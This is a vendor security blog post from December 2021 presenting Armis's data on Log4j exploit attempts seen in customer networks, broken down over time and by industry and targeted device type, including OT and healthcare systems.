Dec 30, 2021

Hackers Continue to Exploit Log4j Over The Holidays


Oz Blas and the Armis Research Team contributed to the data in this blog post.

Inner Hero 735×460

Since the first Log4j vulnerability came to light, security vendors and analysts have published a great deal of information on what to do, ranging all over the map. Vendors and end-user organisations have been scrambling to patch their systems, as attackers tested out exploits and launched hundreds and thousands of attacks. But everyone is still looking to understand how this is impacting organizations around the world.

Exploit Attempts Detected In Almost Half of the Networks

Armis has detected exploit attempts at nearly half of its customer base. It’s important to mention that Armis detects exploit attempts that were able to pass the firewall and reach the internal network. Also important to note these exploit attempts were not successful attempts.

If we look at exploit attempts over time, we see that when the vulnerability was publicly disclosed on December 9, 2021, we saw a very high rate of attempted exploits. Since then, there has been a decline in the number of attempts, probably because Firewalls have been updated and most exploit attempts are being blocked before they reach the network. 

Nevertheless, we continue to see threats that attempt to exploit this vulnerability are able to pass firewalls and may put assets at risk. Image 1 shows that while the number of overall attacks is lower than it was earlier this month, live threats continue to target organizations around the world.


Image 1: Overall exploit attempts detected within customer networks over time.

Exploit Attempts Targeting More Industrial Control Systems and OT Networks

If we look at a breakdown of these numbers by industry, we find a similar trend with the number of attempts targeting IT networks, OT/ICS networks, and Healthcare organizations being higher at first and declining over time.

However, after a week, you can see in image 2 a significant increase in the number of attacks detected in ICS/OT networks.


Image 2: Attack attempts over time by industry

Most Targeted Devices: Servers and Virtual Machines

Image 3 shows the types of devices that were targeted by attacks. Almost half of these devices were virtual machines, and another 38% of the devices were servers. However, many other types of devices were targeted as well, including personal computers, IP cameras, mobile phones, printers, and more.


Image 3: Most targeted devices across all industries 

Industry-Specific IoT, OT, and IOMT Devices Are Targeted As Well 

It’s not surprising to see that in IT environments most targeted devices include virtual machines, servers, and personal devices. But the list also includes IP Cameras, printers, projectors, VOIP, and more. These devices are typically difficult to patch as they aren’t always managed properly. However, since they are connected to the network, if compromised they may put other assets at risk. Therefore it’s important to include these devices as well in threat mitigation plans.


Image 4: Most targeted devices in IT networks

In OT environments (image 5) we see fewer personal devices targeted, which makes sense as they are often not allowed to connect to the network. However, we see industry-specific devices like HMIs, SCADA servers, and engineering workstations under attack.


Image 5: Targeted devices in OT networks

In healthcare and medical environments (image 6), we see a higher number of personal devices being targeted – 18% of the devices targeted, compared to 7% of the devices in IT networks and 1% in OT networks. We also see specific systems like PACS and imaging workstations are being targeted.


Image 6: targeted devices in medical and healthcare environments

Hackers Will Continue To Attack Our Devices in 2022

We expect to see more attacks targeting organizations in 2022. And while organizations are working furiously to patch vulnerable systems, vulnerable systems will continue to exist in our environments, either because they are difficult to patch, or can’t be patched at all. 

This requires us to keep track of unpatched, vulnerable systems, and ensure other protections are in place to prevent exploitation. In addition, it’s important to detect threats targeting these systems in real-time, to properly respond to this threat.

Want to know how Armis can help? See   

Get Updates!

Sign up to receive the latest news